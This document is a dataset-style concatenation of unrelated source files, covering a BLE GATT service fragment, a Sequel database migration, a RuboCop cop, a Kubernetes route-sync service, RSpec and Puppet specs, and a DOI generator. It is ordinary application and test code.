# );
# GattCharacteristic *PowerControlChars[] = { &PowerControlChar, &PowerStateChar };
# static const uint8_t power_control_service_uuid[] = {
# 0x7d, 0x2e, 0x51, 0xcd,
# 0x5a, 0xa0,
# 0x4f, 0x45,
# 0x84, 0xcf,
# 0xad, 0x3d, 0xbd, 0xf2, 0x54, 0x40
# };
# GattService PowerControlService(
# power_control_service_uuid,
# PowerControlChars,
# sizeof(PowerControlChars) / sizeof(GattCharacteristic *)
# );
# /**
# * 2nd Service
# */
# static const uint16_t energy_monitor_char_uuid = 0xFF01;
# uint8_t energy_monitor_char_value[8] = {0,};
# GattCharacteristic EnergyMonitorChar(
# energy_monitor_char_uuid,
# energy_monitor_char_value,
# sizeof(energy_monitor_char_value),
# sizeof(energy_monitor_char_value),
# GattCharacteristic::BLE_GATT_CHAR_PROPERTIES_READ
# );
# GattCharacteristic *EnergyChars[] = { &EnergyMonitorChar };
# static const uint8_t energy_service_uuid[] = {
# 0x7d, 0x2e, 0x51, 0xcd,
# 0x5a, 0xa0,
# 0x4f, 0x45,
# 0x84, 0xcf,
# 0xad, 0x3d, 0xbd, 0xf2, 0x54, 0x41
# };
# GattService EnergyService(
# energy_service_uuid,
# EnergyChars,
# sizeof(EnergyChars) / sizeof(GattCharacteristic *)
# );
# /**
# * Time Count Service
# */
# static const uint16_t time_monitor_char_uuid = 0xFF01;
# uint8_t time_monitor_char_value[8] = {0,};
# GattCharacteristic TimeMonitorChar(
# time_monitor_char_uuid,
# time_monitor_char_value,
# sizeof(time_monitor_char_value),
# sizeof(time_monitor_char_value),
# //GattCharacteristic::BLE_GATT_CHAR_PROPERTIES_READ
# GattCharacteristic::BLE_GATT_CHAR_PROPERTIES_NOTIFY
# );
# GattCharacteristic *TimeChars[] = { &TimeMonitorChar };
# static const uint8_t time_service_uuid[] = {
# 0x7d, 0x2e, 0x51, 0xcd,
# 0x5a, 0xa0,
# 0x4f, 0x45,
# 0x84, 0xcf,
# 0xad, 0x3d, 0xbd, 0xf2, 0x54, 0x42
# };
# GattService TimeService(
# time_service_uuid,
# TimeChars,
# sizeof(TimeChars) / sizeof(GattCharacteristic *)
# );
# GattService *GattServices[] = {
# &EnergyService,
# &PowerControlService,
# &TimeService };
| 31.714286 | 90 | 0.575517 |
3811c99194a7a5eeb901e9d42eab709864c0fd97 | 9,186 | require 'sequel_postgresql_triggers'
# Adds ripeness/RMT classification reference tables (each with created_at /
# updated_at triggers and audit logging) and new columns on rmt_deliveries
# and rmt_bins. The down block reverses everything added in up.
#
# Fix: `up` adds main_cold_treatment_id to rmt_bins, but the original `down`
# never dropped it, leaving the migration irreversible; it is dropped now.
Sequel.migration do
  up do
    extension :pg_triggers

    # RIPENESS CODES
    # -----------------------------------
    create_table(:ripeness_codes, ignore_index_errors: true) do
      primary_key :id
      String :ripeness_code, null: false, unique: true
      String :description
      String :legacy_code
      DateTime :created_at, null: false
      DateTime :updated_at, null: false
    end

    pgt_created_at(:ripeness_codes,
                   :created_at,
                   function_name: :pgt_ripeness_codes_set_created_at,
                   trigger_name: :set_created_at)

    pgt_updated_at(:ripeness_codes,
                   :updated_at,
                   function_name: :pgt_ripeness_codes_set_updated_at,
                   trigger_name: :set_updated_at)

    # Log changes to this table. Exclude changes to the updated_at column.
    run "SELECT audit.audit_table('ripeness_codes', true, true, '{updated_at}'::text[]);"

    # RMT CLASSIFICATION TYPES
    # -----------------------------------
    create_table(:rmt_classification_types, ignore_index_errors: true) do
      primary_key :id
      String :rmt_classification_type_code, null: false, unique: true
      String :description
      TrueClass :required_for_delivery, default: false
      TrueClass :physical_attribute, default: false
      DateTime :created_at, null: false
      DateTime :updated_at, null: false
    end

    pgt_created_at(:rmt_classification_types,
                   :created_at,
                   function_name: :pgt_rmt_classification_types_set_created_at,
                   trigger_name: :set_created_at)

    pgt_updated_at(:rmt_classification_types,
                   :updated_at,
                   function_name: :pgt_rmt_classification_types_set_updated_at,
                   trigger_name: :set_updated_at)

    # Log changes to this table. Exclude changes to the updated_at column.
    run "SELECT audit.audit_table('rmt_classification_types', true, true, '{updated_at}'::text[]);"

    # RMT VARIANTS
    # -----------------------------------
    create_table(:rmt_variants, ignore_index_errors: true) do
      primary_key :id
      foreign_key :cultivar_id, :cultivars, null: false
      String :rmt_variant_code, null: false, unique: true
      String :description
      DateTime :created_at, null: false
      DateTime :updated_at, null: false
    end

    pgt_created_at(:rmt_variants,
                   :created_at,
                   function_name: :pgt_rmt_variants_set_created_at,
                   trigger_name: :set_created_at)

    pgt_updated_at(:rmt_variants,
                   :updated_at,
                   function_name: :pgt_rmt_variants_set_updated_at,
                   trigger_name: :set_updated_at)

    # Log changes to this table. Exclude changes to the updated_at column.
    run "SELECT audit.audit_table('rmt_variants', true, true, '{updated_at}'::text[]);"

    # RMT HANDLING REGIMES
    # -----------------------------------
    create_table(:rmt_handling_regimes, ignore_index_errors: true) do
      primary_key :id
      String :regime_code, null: false, unique: true
      String :description
      TrueClass :for_packing, default: false
      DateTime :created_at, null: false
      DateTime :updated_at, null: false
    end

    pgt_created_at(:rmt_handling_regimes,
                   :created_at,
                   function_name: :pgt_rmt_handling_regimes_set_created_at,
                   trigger_name: :set_created_at)

    pgt_updated_at(:rmt_handling_regimes,
                   :updated_at,
                   function_name: :pgt_rmt_handling_regimes_set_updated_at,
                   trigger_name: :set_updated_at)

    # Log changes to this table. Exclude changes to the updated_at column.
    run "SELECT audit.audit_table('rmt_handling_regimes', true, true, '{updated_at}'::text[]);"

    # RMT CLASSIFICATIONS
    # -----------------------------------
    create_table(:rmt_classifications, ignore_index_errors: true) do
      primary_key :id
      foreign_key :rmt_classification_type_id, :rmt_classification_types, type: :integer, null: false
      String :rmt_classification, null: false, unique: true
      DateTime :created_at, null: false
      DateTime :updated_at, null: false
    end

    pgt_created_at(:rmt_classifications,
                   :created_at,
                   function_name: :pgt_rmt_classifications_set_created_at,
                   trigger_name: :set_created_at)

    pgt_updated_at(:rmt_classifications,
                   :updated_at,
                   function_name: :pgt_rmt_classifications_set_updated_at,
                   trigger_name: :set_updated_at)

    # Log changes to this table. Exclude changes to the updated_at column.
    run "SELECT audit.audit_table('rmt_classifications', true, true, '{updated_at}'::text[]);"

    # RMT CODES
    # -----------------------------------
    create_table(:rmt_codes, ignore_index_errors: true) do
      primary_key :id
      foreign_key :rmt_variant_id, :rmt_variants, null: false
      foreign_key :rmt_handling_regime_id, :rmt_handling_regimes, null: false
      String :rmt_code, null: false, unique: true
      String :description
      DateTime :created_at, null: false
      DateTime :updated_at, null: false
    end

    pgt_created_at(:rmt_codes,
                   :created_at,
                   function_name: :pgt_rmt_codes_set_created_at,
                   trigger_name: :set_created_at)

    pgt_updated_at(:rmt_codes,
                   :updated_at,
                   function_name: :pgt_rmt_codes_set_updated_at,
                   trigger_name: :set_updated_at)

    # Log changes to this table. Exclude changes to the updated_at column.
    run "SELECT audit.audit_table('rmt_codes', true, true, '{updated_at}'::text[]);"

    # RMT DELIVERIES
    # -----------------------------------
    alter_table(:rmt_deliveries) do
      add_foreign_key :rmt_code_id, :rmt_codes
      add_column :rmt_classifications, 'int[]'
      add_column :rmt_treatments, 'int[]'
    end

    # RMT BINS
    # -----------------------------------
    alter_table(:rmt_bins) do
      add_foreign_key :rmt_code_id, :rmt_codes
      add_foreign_key :main_ripeness_treatment_id, :treatments
      add_foreign_key :main_cold_treatment_id, :treatments
      add_column :rmt_classifications, 'int[]'
      add_column :rmt_treatments, 'int[]'
    end
  end

  down do
    # RMT BINS
    alter_table(:rmt_bins) do
      drop_column :rmt_code_id
      drop_column :main_ripeness_treatment_id
      # Fix: this column is added in `up` and was previously not dropped here.
      drop_column :main_cold_treatment_id
      drop_column :rmt_classifications
      drop_column :rmt_treatments
    end

    # RMT DELIVERIES
    alter_table(:rmt_deliveries) do
      drop_column :rmt_code_id
      drop_column :rmt_classifications
      drop_column :rmt_treatments
    end

    # RMT CODES
    drop_trigger(:rmt_codes, :audit_trigger_row)
    drop_trigger(:rmt_codes, :audit_trigger_stm)

    drop_trigger(:rmt_codes, :set_created_at)
    drop_function(:pgt_rmt_codes_set_created_at)
    drop_trigger(:rmt_codes, :set_updated_at)
    drop_function(:pgt_rmt_codes_set_updated_at)
    drop_table(:rmt_codes)

    # RMT CLASSIFICATIONS
    drop_trigger(:rmt_classifications, :audit_trigger_row)
    drop_trigger(:rmt_classifications, :audit_trigger_stm)

    drop_trigger(:rmt_classifications, :set_created_at)
    drop_function(:pgt_rmt_classifications_set_created_at)
    drop_trigger(:rmt_classifications, :set_updated_at)
    drop_function(:pgt_rmt_classifications_set_updated_at)
    drop_table(:rmt_classifications)

    # RMT HANDLING REGIMES
    drop_trigger(:rmt_handling_regimes, :audit_trigger_row)
    drop_trigger(:rmt_handling_regimes, :audit_trigger_stm)

    drop_trigger(:rmt_handling_regimes, :set_created_at)
    drop_function(:pgt_rmt_handling_regimes_set_created_at)
    drop_trigger(:rmt_handling_regimes, :set_updated_at)
    drop_function(:pgt_rmt_handling_regimes_set_updated_at)
    drop_table(:rmt_handling_regimes)

    # RMT VARIANTS
    drop_trigger(:rmt_variants, :audit_trigger_row)
    drop_trigger(:rmt_variants, :audit_trigger_stm)

    drop_trigger(:rmt_variants, :set_created_at)
    drop_function(:pgt_rmt_variants_set_created_at)
    drop_trigger(:rmt_variants, :set_updated_at)
    drop_function(:pgt_rmt_variants_set_updated_at)
    drop_table(:rmt_variants)

    # RMT CLASSIFICATION TYPES
    drop_trigger(:rmt_classification_types, :audit_trigger_row)
    drop_trigger(:rmt_classification_types, :audit_trigger_stm)

    drop_trigger(:rmt_classification_types, :set_created_at)
    drop_function(:pgt_rmt_classification_types_set_created_at)
    drop_trigger(:rmt_classification_types, :set_updated_at)
    drop_function(:pgt_rmt_classification_types_set_updated_at)
    drop_table(:rmt_classification_types)

    # RIPENESS CODES
    drop_trigger(:ripeness_codes, :audit_trigger_row)
    drop_trigger(:ripeness_codes, :audit_trigger_stm)

    drop_trigger(:ripeness_codes, :set_created_at)
    drop_function(:pgt_ripeness_codes_set_created_at)
    drop_trigger(:ripeness_codes, :set_updated_at)
    drop_function(:pgt_ripeness_codes_set_updated_at)
    drop_table(:ripeness_codes)
  end
end
| 37.190283 | 101 | 0.675376 |
f7b6420d0036c05f0c477173d4bf442090f7e2ce | 2,260 | # encoding: utf-8
module RuboCop
  module Cop
    module Performance
      # This cop is used to identify usages of `map { ... }.flatten(1)` /
      # `collect { ... }.flatten(1)` and suggests `flat_map { ... }` instead.
      #
      # @example
      #   # bad
      #   [1, 2, 3, 4].map { |e| [e, e] }.flatten(1)
      #   [1, 2, 3, 4].collect { |e| [e, e] }.flatten(1)
      #
      #   # good
      #   [1, 2, 3, 4].flat_map { |e| [e, e] }
      #   [1, 2, 3, 4].map { |e| [e, e] }.flatten
      #   [1, 2, 3, 4].collect { |e| [e, e] }.flatten
      class FlatMap < Cop
        MSG = 'Use `flat_map` instead of `%s...%s`.'
        FLATTEN_MULTIPLE_LEVELS = ' Beware, `flat_map` only flattens 1 level ' \
                                  'and `flatten` can be used to flatten ' \
                                  'multiple levels.'
        # Both the safe and in-place flatten variants are flagged.
        FLATTEN = [:flatten, :flatten!]

        # Flags send nodes of the shape `<recv>.map/collect {...}.flatten(n)`.
        def on_send(node)
          # node destructures as (receiver, method_name, first_arg).
          left, second_method, flatten_param = *node
          return unless FLATTEN.include?(second_method)
          flatten_level, = *flatten_param
          # `left` is the block node wrapping the map/collect send.
          expression, = *left
          _array, first_method = *expression
          return unless first_method == :map || first_method == :collect

          message = MSG
          # With the option enabled, also flag bare `.flatten` (no level),
          # warning that flat_map only flattens one level.
          if cop_config['EnabledForFlattenWithoutParams'] && flatten_level.nil?
            message = MSG + FLATTEN_MULTIPLE_LEVELS
          else
            # Only `flatten(1)` is exactly equivalent to flat_map.
            return unless flatten_level == 1
          end

          # Highlight from `map`/`collect` through the end of `flatten`.
          range = Parser::Source::Range.new(node.loc.expression.source_buffer,
                                            expression.loc.selector.begin_pos,
                                            node.loc.selector.end_pos)

          add_offense(node, range, format(message, first_method, second_method))
        end

        # Rewrites `x.map {...}.flatten(1)` to `x.flat_map {...}`.
        # Only autocorrects when an explicit flatten level was given.
        def autocorrect(node)
          receiver, _flatten, flatten_param = *node
          flatten_level, = *flatten_param
          return if flatten_level.nil?
          array, = *receiver
          lambda do |corrector|
            # Remove `.flatten(1)` (from the dot to the end of the call) ...
            range = Parser::Source::Range.new(node.loc.expression.source_buffer,
                                              node.loc.dot.begin_pos,
                                              node.loc.expression.end_pos)

            corrector.remove(range)
            # ... and rename `map`/`collect` to `flat_map`.
            corrector.replace(array.loc.selector, 'flat_map')
          end
        end
      end
    end
  end
end
| 34.242424 | 80 | 0.511947 |
d581f0d0713e237a6f81b3c475c340b951b9673b | 8,548 | # frozen_string_literal: true
# Syncs 3scale proxy/provider endpoints into OpenShift Routes in the pod's
# namespace. Routes are created/patched/deleted to match the entry data, and
# stale routes carrying this service's labels are cleaned up.
#
# Fix: verify_route_status used assignment (`condition.type = 'Admitted'`)
# inside `find`, which always matched — and mutated — the first condition;
# the intended equality comparison is restored.
class Integration::KubernetesService < Integration::ServiceBase
  attr_reader :namespace

  # When KUBERNETES_ROUTE_TLS is truthy, keep the existing route's TLS spec
  # instead of overwriting it on update (see #update_resource).
  class_attribute :maintain_tls_spec,
                  default: ActiveModel::Type::Boolean.new.cast(ENV['KUBERNETES_ROUTE_TLS'])

  def initialize(integration, namespace: self.class.namespace)
    super(integration)
    @namespace = namespace
    @client = K8s::Client.autoconfig(namespace: namespace).extend(MergePatch)
  end

  # Adds JSON merge-patch support to the autoconfigured client.
  module MergePatch
    # @param resource [K8s::Resource]
    # @param attrs [Hash]
    # @return [K8s::Client]
    def merge_resource(resource, attrs)
      client_for_resource(resource).merge_patch(resource.metadata.name, attrs)
    end
  end

  # Namespace from the environment, falling back to the mounted service
  # account secret (TELEPRESENCE_ROOT supports local development).
  def self.namespace
    ENV.fetch('KUBERNETES_NAMESPACE') { File.read(File.join((ENV['TELEPRESENCE_ROOT'] || '/'), 'var/run/secrets/kubernetes.io/serviceaccount/namespace')) }
  end

  # Dispatches on the entry's record type; other record types are ignored.
  def call(entry)
    case entry.record
    when Proxy then handle_proxy(entry)
    when Provider then handle_provider(entry)
    end
  end

  def handle_proxy(entry)
    persist_proxy?(entry) ? persist_proxy(entry) : delete_proxy(entry)
  end

  def handle_provider(entry)
    persist?(entry) ? persist_provider(entry) : delete_provider(entry)
  end

  attr_reader :client

  # Only hosted (SaaS-managed) proxies get routes.
  def persist_proxy?(entry)
    entry.data&.dig('deployment_option') == 'hosted'
  end

  # Entries without data represent deletions.
  def persist?(entry)
    entry.data
  end

  # Fetches the controller owner of a resource, or nil when it has none.
  def owner_reference_controller(resource)
    owner_references = resource.metadata.ownerReferences or return

    controller = owner_references.find(&:controller)
    controller.metadata = { namespace: namespace, name: controller.name }

    client.get_resource(controller)
  end

  # Walks ownerReferences up to the topmost controller (e.g. the Deployment
  # behind this pod), tolerating RBAC-forbidden lookups along the way.
  def owner_reference_root(resource)
    while (owner = owner_reference_controller(resource))
      resource = owner
    end

    resource
  rescue K8s::Error::Forbidden
    # likely some resource like the operator
    resource
  end

  # Resolves the object that should own created routes: the root owner of
  # the current pod.
  def get_owner
    pod_name = ENV['KUBERNETES_POD_NAME'] || ENV['POD_NAME'] || ENV['HOSTNAME']

    pod = client.api('v1').resource('pods', namespace: namespace).get(pod_name)

    owner_reference_root(pod)
  end

  def as_reference(owner)
    K8s::API::MetaV1::OwnerReference.new(
      kind: owner.kind,
      apiVersion: owner.apiVersion,
      name: owner.metadata.name,
      uid: owner.metadata.uid
    )
  end

  def annotations_for(entry)
    {
      '3scale.net/gid': entry.to_gid.to_s,
      'zync.3scale.net/gid': entry.model.record.to_gid.to_s,
    }
  end

  # The label subset used to find resources previously created for a record.
  def label_selector_from(resource)
    resource.metadata.labels.to_h.with_indifferent_access.slice(
      '3scale.net/created-by', '3scale.net/tenant_id', 'zync.3scale.net/record', 'zync.3scale.net/route-to'
    )
  end

  def labels_for(entry)
    {
      '3scale.net/created-by': 'zync',
      '3scale.net/tenant_id': String(entry.tenant_id),
      'zync.3scale.net/record': entry.model.record.to_gid_param,
    }
  end

  def labels_for_proxy(entry)
    service_id = entry.last_known_data.fetch('service_id') { return }

    labels_for(entry).merge(
      'zync.3scale.net/ingress': 'proxy',
      '3scale.net/service_id': String(service_id)
    )
  end

  def labels_for_provider(entry)
    provider_id = entry.last_known_data.fetch('id')

    labels_for(entry).merge(
      'zync.3scale.net/ingress': 'provider',
      '3scale.net/provider_id': String(provider_id)
    )
  end

  # Thin wrapper fixing apiVersion/kind for OpenShift Route resources.
  class Route < K8s::Resource
    def initialize(attributes, **options)
      super attributes.with_indifferent_access
                .merge(apiVersion: 'route.openshift.io/v1', kind: 'Route')
                .reverse_merge(metadata: {}), **options
    end
  end

  # Builds the `spec` of a Route from a URL, target service and port.
  # HTTPS (or schemeless) URLs get edge TLS termination with HTTP redirect.
  class RouteSpec < K8s::Resource
    def initialize(url, service, port)
      uri = URI(url)

      tls_options = {
        insecureEdgeTerminationPolicy: 'Redirect',
        termination: 'edge'
      } if uri.class == URI::HTTPS || uri.scheme.blank?

      super({
        host: uri.host || uri.path,
        port: { targetPort: port },
        to: {
          kind: 'Service',
          name: service
        }
      }.merge(tls: tls_options))
    end
  end

  # Routes for the production and staging APIcast gateways.
  def build_proxy_routes(entry)
    build_routes('zync-3scale-api-', [
      RouteSpec.new(entry.data.fetch('endpoint'), 'apicast-production', 'gateway'),
      RouteSpec.new(entry.data.fetch('sandbox_endpoint'), 'apicast-staging', 'gateway')
    ], labels: labels_for_proxy(entry), annotations: annotations_for(entry))
  end

  # Wraps each spec in a Route owned by this pod's controller, merging the
  # caller's labels/annotations with per-route host/target markers.
  def build_routes(name, specs = [], owner: get_owner, **metadata)
    specs.map do |spec|
      Route.new(
        metadata: {
          generateName: name,
          namespace: namespace,
          labels: owner.metadata.labels,
          ownerReferences: [as_reference(owner)]
        }.deep_merge(metadata.deep_merge(
          labels: {
            'zync.3scale.net/route-to': spec.to_h.dig(:to, :name),
          },
          annotations: {
            'zync.3scale.net/host': spec.host,
          }
        )),
        spec: spec
      )
    end
  end

  # Developer + admin routes for a tenant; the master account (where the
  # admin domain equals the domain) only gets the system-master route.
  def build_provider_routes(entry)
    data = entry.data
    domain, admin_domain = data.values_at('domain', 'admin_domain')

    metadata = { labels: labels_for_provider(entry), annotations: annotations_for(entry) }

    if admin_domain == domain # master account
      build_routes('zync-3scale-master-', [
        RouteSpec.new(data.fetch('domain'), 'system-master', 'http')
      ], **metadata)
    else
      build_routes('zync-3scale-provider-', [
        RouteSpec.new(data.fetch('domain'), 'system-developer', 'http'),
        RouteSpec.new(data.fetch('admin_domain'), 'system-provider', 'http')
      ], **metadata)
    end
  end

  # Deletes every labeled resource that is not in the keep-list.
  def cleanup_but(list, label_selector)
    client
      .client_for_resource(list.first, namespace: namespace)
      .list(labelSelector: label_selector)
      .each do |resource|
      equal = list.any? { |object| object.metadata.uid === resource.metadata.uid && resource.metadata.selfLink == object.metadata.selfLink }
      Rails.logger.warn "Deleting #{resource.metadata} from k8s because it is not on #{list}"
      client.delete_resource(resource) unless equal
    end
  end

  def extract_route_patch(resource)
    {
      metadata: resource.metadata.to_h,
      spec: { host: resource.spec.host },
    }
  end

  # Creates or updates each resource; duplicates sharing the same label
  # selector are collapsed to a single fresh resource.
  protected def persist_resources(list)
    list.map do |resource|
      existing = client
                     .client_for_resource(resource, namespace: namespace)
                     .list(labelSelector: label_selector_from(resource))
      client.get_resource case existing.size
                          when 0
                            client.create_resource(resource)
                          when 1
                            update_resource(existing.first, resource)
                          else
                            existing.each(&client.method(:delete_resource))
                            client.create_resource(resource)
                          end
    end
  end

  # Verifies routes were admitted; HostAlreadyClaimed routes are deleted so
  # OpenShift will re-admit them on the next sync, then the error re-raises.
  def cleanup_routes(routes)
    routes.each do |route|
      begin
        verify_route_status(route)
      rescue InvalidStatus => error
        # they need to be re-created anyway, OpenShift won't re-admit them
        client.delete_resource(route) if error.reason == 'HostAlreadyClaimed' && error.type == 'Admitted'

        raise
      end
    end
  end

  # Raised when a route's Admitted condition is not True.
  class InvalidStatus < StandardError
    attr_reader :type, :reason

    def initialize(condition)
      @type, @reason = condition.type, condition.reason
      super(condition.message)
    end
  end

  # Checks the Admitted condition of the ingress matching the route's host.
  def verify_route_status(route)
    ingress = route.status.ingress.find { |ingress| ingress.host == route.spec.host }
    # Fixed: was `condition.type = 'Admitted'` (assignment), which always
    # matched and overwrote the first condition's type.
    condition = ingress.conditions.find { |condition| condition.type == 'Admitted' }

    raise InvalidStatus, condition unless condition.status == 'True'
  end

  # Merge-patches an existing route; falls back to delete + create when the
  # patch is rejected as invalid. Honors maintain_tls_spec (see above).
  def update_resource(existing, resource)
    resource.spec.delete_field(:tls) if maintain_tls_spec?
    client.merge_resource(existing, resource)
  rescue K8s::Error::Invalid
    resource.spec.tls = existing.spec.tls if maintain_tls_spec?
    client.delete_resource(existing)
    client.create_resource(resource)
  end

  def persist_proxy(entry)
    routes = build_proxy_routes(entry)

    cleanup_routes persist_resources(routes)
  end

  def delete_proxy(entry)
    label_selector = labels_for_proxy(entry)
    cleanup_but([Route.new({})], label_selector)
  end

  def persist_provider(entry)
    routes = build_provider_routes(entry)
    cleanup_routes persist_resources(routes)
  end

  def delete_provider(entry)
    label_selector = labels_for_provider(entry)
    cleanup_but([Route.new({})], label_selector)
  end
end
| 28.684564 | 155 | 0.662494 |
037ddc28b6d57f920d637f731f7502bccd2823e4 | 854 | # frozen_string_literal: true
require "active_support"
require "active_support/core_ext/class/attribute"
require "active_support/core_ext/object/inclusion"
require "spicerack/version"
require "around_the_world"
require "short_circu_it"
require "substance"
require "tablesalt"
require "technologic"
require "redis_hash"
require "spicerack/array_index"
require "spicerack/hash_model"
require "spicerack/redis_model"
module Spicerack
  # Base error class for the Spicerack gem.
  class Error < StandardError; end

  include ActiveSupport::Deprecation::DeprecatedConstantAccessor

  # Legacy constant names resolve (with a deprecation warning) to their new
  # homes in the Substance gem.
  deprecate_constant "RootObject", "Substance::RootObject"
  deprecate_constant "AttributeObject", "Substance::AttributeObject"
  deprecate_constant "InputModel", "Substance::InputModel"
  deprecate_constant "InputObject", "Substance::InputObject"
  deprecate_constant "OutputObject", "Substance::OutputObject"
end
| 26.6875 | 68 | 0.818501 |
d51fd0bfd4cb31e791bab1619fec6b09727e5fee | 940 | require 'opal/jquery/element'
module Browser
  # {Window} instances are {Native} objects used to wrap native window instances.
  #
  # Generally, you will want to use the top level {::Window} instance, which
  # wraps `window` from the main page.
  class Window
    include Native

    # Returns this {Window} instance wrapped as an {Element}. Useful for
    # delegating jQuery events, which allows the use of `window` as target.
    # Memoized after the first call.
    #
    # @return [Element]
    def element
      @element ||= Element.find(`window`)
    end

    # Attaches an event handler; delegates to the wrapped {Element}.
    # @see Element#on
    def on(*args, &block)
      element.on(*args, &block)
    end

    # Detaches an event handler; delegates to the wrapped {Element}.
    # @see Element#off
    def off(*args, &block)
      element.off(*args, &block)
    end

    # Fires an event; delegates to the wrapped {Element}.
    # @see Element#trigger
    def trigger(*args)
      element.trigger(*args)
    end
  end
end

# Top level {Browser::Window} instance.
Window = Browser::Window.new(`window`)

# TODO: this will be removed soon.
# Legacy global alias for the top-level window wrapper.
$window = Window
| 22.926829 | 81 | 0.648936 |
26e2e67ebb468b320dd0365ae8aef2f799b1b2c1 | 672 | require "spec_helper"
# Feature spec: a guest signs up as a participant and then submits a session
# proposal to the pre-created event.
feature "Manage Sessions" do
  # An event must exist before sessions can be proposed.
  background do
    create(:event, :full_event)
  end

  scenario "As a guest, I want to register " do
    visit root_path
    click_link "add-sessions-button"
    # Guests are sent through registration first.
    click_link "Register here"
    fill_in 'participant_name', with: 'Jack Johnson'
    fill_in 'Your email', with: '[email protected]'
    fill_in 'Password', with: 's00persekret'
    click_button "Create Participant"
    # Now signed in, adding a session shows the session form.
    click_link "add-sessions-button"
    fill_in('Title', with: 'Rails 4 FTW')
    fill_in('Description', with: 'Rails Desc')
    click_button 'Create Session'
    expect(page).to have_content 'Thanks for adding your session.'
  end
end
| 24 | 66 | 0.697917 |
384df5b668cb303622d07cc0c288517087f3356a | 3,202 | require 'spec_helper'
# Unit tests for the nova::conductor Puppet class. Shared examples cover the
# package/service resources and nova_config settings; they are run once per
# supported OS with per-platform package and service names.
describe 'nova::conductor' do

  let :pre_condition do
    'include nova'
  end

  shared_examples 'nova-conductor' do

    it { is_expected.to contain_package('nova-conductor').with(
      :name   => platform_params[:conductor_package_name],
      :ensure => 'present'
    ) }

    it { is_expected.to contain_service('nova-conductor').with(
      :name      => platform_params[:conductor_service_name],
      :hasstatus => 'true',
      :ensure    => 'running'
    )}

    # Service state should be left unmanaged when manage_service is false.
    context 'with manage_service as false' do
      let :params do
        { :enabled        => true,
          :manage_service => false
        }
      end
      it { is_expected.to contain_service('nova-conductor').without_ensure }
    end

    context 'with package version' do
      let :params do
        { :ensure_package => '2012.1-2' }
      end
      it { is_expected.to contain_package('nova-conductor').with(
        :ensure => params[:ensure_package]
      )}
    end

    context 'with overridden workers parameter' do
      let :params do
        {:workers => '5' }
      end
      it { is_expected.to contain_nova_config('conductor/workers').with_value('5') }
    end

    context 'with default enable_new_services parameter' do
      it { is_expected.to contain_nova_config('DEFAULT/enable_new_services').with_value('<SERVICE DEFAULT>') }
    end

    context 'with enable_new_services parameter set to false' do
      let :params do
        { :enable_new_services => false }
      end
      it { is_expected.to contain_nova_config('DEFAULT/enable_new_services').with_value(false) }
    end

    # Database settings come from the nova base class, not this class.
    context 'with default database parameters' do
      let :pre_condition do
        "include nova"
      end
      it { is_expected.to_not contain_nova_config('database/connection') }
      it { is_expected.to_not contain_nova_config('database/slave_connection') }
      it { is_expected.to_not contain_nova_config('database/connection_recycle_time').with_value('<SERVICE DEFAULT>') }
    end

    context 'with overridden database parameters' do
      let :pre_condition do
        "class { 'nova':
database_connection => 'mysql://user:pass@db/db',
slave_connection => 'mysql://user:pass@slave/db',
database_idle_timeout => '30',
}
"
      end
      it { is_expected.to contain_oslo__db('nova_config').with(
        :connection              => 'mysql://user:pass@db/db',
        :slave_connection        => 'mysql://user:pass@slave/db',
        :connection_recycle_time => '30',
      )}
    end
  end

  # Run the shared examples on every supported OS with the platform-specific
  # package/service names.
  on_supported_os({
    :supported_os => OSDefaults.get_supported_os
  }).each do |os,facts|
    context "on #{os}" do
      let (:facts) do
        facts.merge!(OSDefaults.get_facts())
      end

      let (:platform_params) do
        case facts[:osfamily]
        when 'Debian'
          { :conductor_package_name => 'nova-conductor',
            :conductor_service_name => 'nova-conductor' }
        when 'RedHat'
          { :conductor_package_name => 'openstack-nova-conductor',
            :conductor_service_name => 'openstack-nova-conductor' }
        end
      end
      it_configures 'nova-conductor'
    end
  end
end
| 28.336283 | 119 | 0.62055 |
5d0d949ea60b666bdb32a34feec3c6a5755ae608 | 3,235 | # instantiate IdGen with make_class and
# call mint_id and update_metadata for it to choose and mint the right types of ids based on tenant config
#
# Instance of this class is really never used directly by outside code, but one of the subclasses is used.
# require 'stash/doi/datacite_gen'
# require 'stash/doi/ezid_gen'
module Stash
  module Doi
    # Abstract base for identifier (DOI) generators. Callers use
    # .make_instance / .mint_id to get the right provider-specific subclass
    # (EzidGen or DataciteGen) based on the resource tenant's configuration.
    class IdGen
      attr_reader :resource

      # this is to take the place of the normal initialize to create a class of the correct type
      # NOTE(review): returns nil for any provider other than 'ezid' or
      # 'datacite' — verify callers never configure a third provider.
      def self.make_instance(resource:)
        id_svc = resource.tenant.identifier_service
        if id_svc.provider == 'ezid'
          EzidGen.new(resource: resource)
        elsif id_svc.provider == 'datacite'
          DataciteGen.new(resource: resource)
        end
      end

      # select correct identifier service class based on resource (and tenant) and mint an id
      def self.mint_id(resource:)
        id_gen = make_instance(resource: resource)
        id_gen.mint_id
      end

      # The method reserves a DOI if needed for a specified DOI or minting one from the pool. (formerly?) used by Merritt
      # submission to be sure a (minted if needed) stash_engine_identifier exists with the ID filled in before doing fun stuff
      def ensure_identifier
        # ensure an existing identifier is reserved (if needed for EZID)
        if resource.identifier && resource.identifier.identifier # if identifier has value
          log_info("ensuring identifier is reserved for resource #{resource.id}, ident: #{resource.identifier_str}")
          return resource.identifier.to_s if resource.skip_datacite_update
          return reserve_id(doi: resource.identifier.to_s) # reserve_id is smart and doesn't reserve again if it already exists
        end
        # otherwise create a new one
        log_info("minting new identifier for resource #{resource.id}")
        # this ensures it has a stash_engine_identifier for the resource, mint_id is either EZID or DC mint method
        resource.ensure_identifier(mint_id)
      end

      # Pushes the landing page URL and DataCite 4 XML to the provider,
      # unless the resource opts out via skip_datacite_update.
      def update_identifier_metadata!
        log_info("updating identifier landing page (#{landing_page_url}) and metadata for resource #{resource.id} (#{resource.identifier_str})")
        sp = Stash::Merritt::SubmissionPackage.new(resource: resource, packaging: nil)
        dc4_xml = sp.dc4_builder.contents
        update_metadata(dc4_xml: dc4_xml, landing_page_url: landing_page_url) unless resource.skip_datacite_update
      end

      # Memoized landing page URL built from the engine's routes.
      def landing_page_url
        @landing_page_url ||= StashEngine::Engine.routes.url_helpers.show_url(resource.identifier_str)
      end

      def initialize(resource:)
        @resource = resource
      end

      def log_info(message)
        Rails.logger.info("#{Time.now.xmlschema} #{self.class}: #{message}")
      end

      # subclasses should implement mint_id and update_metadata(dc4_xml:, landing_page_url:) methods

      private

      def tenant
        resource.tenant
      end

      # Provider configuration (credentials, account) from the tenant.
      def id_params
        @id_params ||= tenant.identifier_service
      end

      def owner
        id_params.owner
      end

      def password
        id_params.password
      end

      def account
        id_params.account
      end
    end
  end
end
